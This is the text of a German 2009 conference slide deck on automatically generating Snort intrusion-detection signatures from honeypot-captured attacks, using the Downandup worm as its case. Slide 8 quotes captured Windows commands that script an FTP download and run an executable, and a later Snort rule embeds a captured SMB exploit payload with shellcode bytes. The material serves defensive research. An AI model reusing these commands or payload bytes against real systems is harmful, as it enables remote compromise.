Automatisches Generieren komplexer Intrusion-Detection-Signaturen Tillmann Werner Cyber Defence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung

Automatisches Generieren komplexerIntrusion-Detection-Signaturen

Automatisches Generieren komplexerIntrusion-Detection-Signaturen

Tillmann Werner

Cyber Defence – Schutzlos in einer vernetzten Welt?AFCEA-Informationsveranstaltung

16. Februar 2009

Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen

Angriffe im Internet

2

Typischer Ablauf von Angriffen

• Scannen von Netzbereichen nach angreifbaren Rechnern• Automatische, parallelisiere Systemkompromittierung• Download des eigentlichen Schadprogramms• Zusammenschluss übernommener Systeme zu Botnetzen• Weitere Attacken

11 3

2

4

5

C&C

0wned


Fallbeispiel: Downandup-Wurm

3Tillmann Wern er AFCEA: Cyber Defence

Fakten

• Verbreitet sich automatisch über Netzwerke• Nutzt Schwachstelle im Server Service auf Windows-Systemen• Lädt Schadprogramm auf kompromittierte Maschinen• Schließt infizierte Computer zu einem Botnetz zusammen

• 23.10.2008: Microsoft veröffentlicht außerplanmäßiges Advisory MS08-067• 26.10.2008: PoC-Exploits im Internet verfügbar• 04.11.2008: Erste Exploits in Sensoren der Universität Bonn• 21.11.2008: Downandup • 16.01.2009: F-Secure: 9 Millionen infizierte Systeme weltweit• 20.01.2009: 70 Systeme der Royal Navy befallen (BBC News)• 21.01.2009: Intramar infizier – Jets der frz. Marine können nicht starten (Telegraph)• 25.01.2009: Pandalabs: 5,77% aller PC infiziert• 07.02.2009: Amtsgericht Houston für 4 Tage lahmgelegt• 12.02.2009: Microsoft setzt 250.000$ Kopfgeld aus• 13.02.2009: Hunderte Systeme der Bundeswehr befallen (Spiegel Online)

??


Inhalt

4

• Motivation

• Sensorik

• Signaturgenerierung

• Anwendung und Ausblick



Motivation

5

Network Intrusion Detection

• Signaturen zur Erkennung und Blockade von Angriffen in Netzen

• Konzeptuelle Eigenschaft: Reaktiv per Definition• Signatur: Formale Beschreibung spezieller Eigenschaften• Dazu genaue Kenntnis von Angriffen nötig

• Ständig wechselnde Angriffstrends• Manuelles Signatur-Engineering kann nicht Schritt halten • Automatisierte Angriffe erfordern automatisierte Gegenmaßnahmen

Signaturgenerierung

• Minimierung des Zeitfensters ohne Schutz• Idee: Signaturen aus Angriffen berechnen• Weitere Angriffe dann detektierbar



Sensorik

6

Anforderungen

• Erfassen neuer Angriffstypen und –varianten• Verteilte Sensorik, zentrale Auswertung

• Entkopplung Angriffserfassung und Signaturgenerierung• Datenerfassung ist zeitkritisch• Signaturgenerierung ist rechenintensiv

Honeypots

• Spezielle Opfer-Systeme mit dem Ziel, angegriffen zu werden• Erfassen möglichst viele Informationen zu jedem Angriff• Können auch völlig unbekannte Attacken erfassen

Wo ansetzen?

• Schwachstellen sind die Angriffsvektoren• Ziel: Abwehr der initialen Attacke



Signaturgenerierung: Überblick

7

Generierungsprozess

• Sensoren erfassen und übermitteln Angriffsdaten• Automatische Klassifizierung• Identifizieren invarianter Anteile• Signatur-Komposition• Format-Übersetzung



Beispiel

8

cmd /c echo open 192.168.1.100 17713 >> ii &echo user 1 1 >> ii &echo get smc.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &smc.exe

cmd /c echo open 0.0.0.0 29221 >> ii &echo user 1 1 >> ii &echo get crsss.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &crsss.exe

cmd /c echo open 192.168.176.184 39354 >> ii &echo user 1 1 >> ii &echo get aglopmn.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &aglopmn.exe

alert tcp any any -> \$HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";\ content: "cmd /c echo open "; offset: 0; depth: 17;\ content: "exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &";\ distance: 55; within: 139;\ sid: 2000001; rev: 1;)



Signaturgenerierung: Automatische Klassifizierung

9

Angriffsklassen

• Ziel: Generiere eine Signatur pro Angriffsklasse• Klasse: Menge aller ähnlichen Angriffe• Ähnlichkeit definiert anhand syntaktischer Merkmale

Automatische Klassifizierung (Clustering)

• Clustern eingehender Angriffe anhand Ähnlichkeit• Graph-basierter Algorithmus• Zusammenhangskomponenten repräsentieren Cluster• Online-Verfahren, d.h. neue Klassen werden zur Laufzeit gebildet



Signaturgenerierung: Identifizieren invarianter Anteile

10

Gemeinsame Substrings

• Gesucht: Substrings, die in allen Angriffen eines Clusters vorkommen• Diese stellen gemeinsame Merkmale dar• Signatur : Gemeinsame Substrings mit Positionsangaben

1 32

Finden aller gemeinsamen Substrings

• Algorithmus auf Basis von Generalized Suffix Trees• Speziell für die Signaturgenerierung entwickelt• Sehr effizient: O(n) bei n = Summe aller Angriffsbytes



Signaturgenerierung: Komposition und Übersetzung

11

Signatur-Komposition

• Ziel: Möglichst lange Sequenz bilden• Greedy-Algorithmus: Ergänzt sukzessive nächstlängsten Substring• Ergebnis nicht notwendigerweise optimal• Einfaches Optimieren wegen Mehrstufigkeit des Verfahrens

Signatur-Übersetzung

• Generierte Roh-Signatur in der Praxis nicht einsetzbar• Snort-Format: De-facto-Standard• Syntax besitzt die benötigte Mächtigkeit

alert tcp any any -> \$HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";\ content: "cmd /c echo open "; offset: 0; depth: 17;\ content: "exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &";\ distance: 55; within: 139;\ sid: 2000001; rev: 1;)




Signaturgenerierung: Komposition und Übersetzung

12Tillmann Werner

alert tcp any any -> any any (msg: "nebula rule 2000001 rev. 4"; \ content: "|00 00 85 ff|SMBr|00 00 00 00 18|S|c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00|7|13 00 00 00 00 00|b|00 02|PC NETWORK PROGRAM 1.0|00 02|LANMAN1.0|00 02|Windows for Workgroups 3.1a|00 02|LM1.2X002|00 02| LANMAN2.1|00 02|NT LM 0.12|00 00 00 10 bf ff|SMBs|00 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00|7|13 00 00 00 00 0c ff 00 00 00 04 11 0a 00 00 00 00 00 00 00|~|10 00 00 00 00 d4 00 00 80|~|10|`|82 10|z|06 06|+|06 01 05 05 02 a0 82 10|n0|82 10|j|a1 82 10|f#|82 10|b|03 82 04 01 00|AAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|03 00|#|82 0c|W|03 82 04 0a 00 90|B|90|B|90|B|90|B|81 c4|T |f2 ff ff fc e8|F|00 00 00 8b|E<|8b 7c 05|x|01 ef 8b|O|18 8b|_ |01 eb e3|.I|8b|4|8b 01 ee|1|c0 99 ac 84 c0 |t|07 c1 ca 0d 01 c2 eb f4|\;T|24 04|u|e3 8b|_|24 01 eb|f|8b 0c|K|8b|_|1c 01 eb 8b 1c 8b 01 eb 89|\\|24 04 c3|1|c0|d|8b|@0|85 c0|x|0f 8b|@|0c 8b|p|1c ad 8b|h|08 e9 0b 00 00 00 8b|@4|05 7c 00 00 00 8b|h<_1|f6|`V|eb 0d|h|ef ce e0|`h|98 fe 8a 0e|W|ff e7 e8 ee ff ff ff|cmd /c echo open "; depth: 1435; offset: 0; \ content: ">> ii &echo user "; distance: 13; within: 1473; \ content: "exe >> ii &echo bye >> ii &ftp -n -v -s\:ii &del ii &"; distance: 17; within: 127; \ content: "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#|0a 03 08 00 f8 0f 01 00 f8 0f 01|#|82 08|9|03 82 04 11 00|CCCC |f0 fd 7f|SVWf|81 ec 80 00 89 e6 e8 ed 00 00 00 ff|6h|09 12 d6|c|e8 f7 00 00 00 89|F|08 e8 a2 00 00 00 ff|v|04|hk|d0|+|ca e8 e2 00 00 00 89|F|0c e8|?|00 00 00 ff|v|04|h|fa 97 02|L|e8 cd 00 00 00|1|db|h|10 04 00 00|S|ff d0 89 c3|V|8b|v|10 89 c7 b9 10 04 00 00 f3 a4|^1|c0|PPPSPP|ff| V|0c 8b|F|08|f|81 c4 80 00|_^[|ff e0|`|e8|#|00 00 00 8b|D|24 0c 8d|X|7c 83|C<|05 81|C(|00 10 00 00 81|c(|0 0 f0 ff ff 8b 04 24 83 c4 14|P1|c0 c3|1|d2|d|ff|2d|89|\"1|db b8 90|B|90|B1|c9 b1 02 89 df f3 af|t|03|C|eb f3 89|~|10|d|8f 02|Xa|c3|`|bf| |f0 fd 7f 8b 1f 8b|F|08 89 07 8b 7f f8 81 c7|x|01 00 00 89 f9|9|19|t|04 8b 09 eb f8 89 fa|9Z|04|t|05 8b|R|04 eb f6 89 11 89|J|04 c6|C|fd 01|a|c3 a1 0c f0 fd 7f 8b|@|1c 8b|X|08 89 1e 8b 00 8b|@|08 89|F|04 c3|`|8b|l|24|(|8b|E<|8b|T|05|x|01 ea 8b|J|18 8b|Z |01 eb e3|8I|8b|4|8b 01 ee|1|ff|1| c0 fc ac|8|e0|t|07 c1 cf 0d 01 c7 eb f4|\;|7c 24 24|u|e1 8b|Z|24 01 eb|f|8b 0c|K|8b|Z|1c 01 eb 8b 04 8b 01 e8 89|D|24 1c|a|c2 08 00 eb fe|CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCC#|82 04| |03 09 00 eb 06 90 90 90 90 90 90 03 82 04 11 00|DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDD|00 00 00 00 00 00|"; distance: 19; within: 2937; \ sid: 2000001; rev: 4;)


Anwendung und Ausblick

13

Selbstschützende Netze

• Sensoren, Signatur-Generator und IDS im selben Netz• Neue Regel bei neuen Angriffswellen• Aktuell eher Forschungscharacter wegen Missbrauchsgefahr

Werkzeug zur Angriffsanalyse

• Methode auch hilfreich bei manueller Angriffsanaylse• Signatur beschreibt statische Anteile• Schnelleres Verständnis von Angriffsdetails

Ausblick

• Weitere Forschung nötig und möglich• Verbesserung insbesondere durch mehr strukturelles Wissen über Angriffe• Idee: Lernen von Dialogstrukturen zwischen Angreifer und Opfer


Fragen?Fragen?

Tillmann [email protected]

Institut für Informatik IVUniversität BonnRömerstraße 16453117 Bonn

Documents

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Tillmann Werner Cyber Defence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung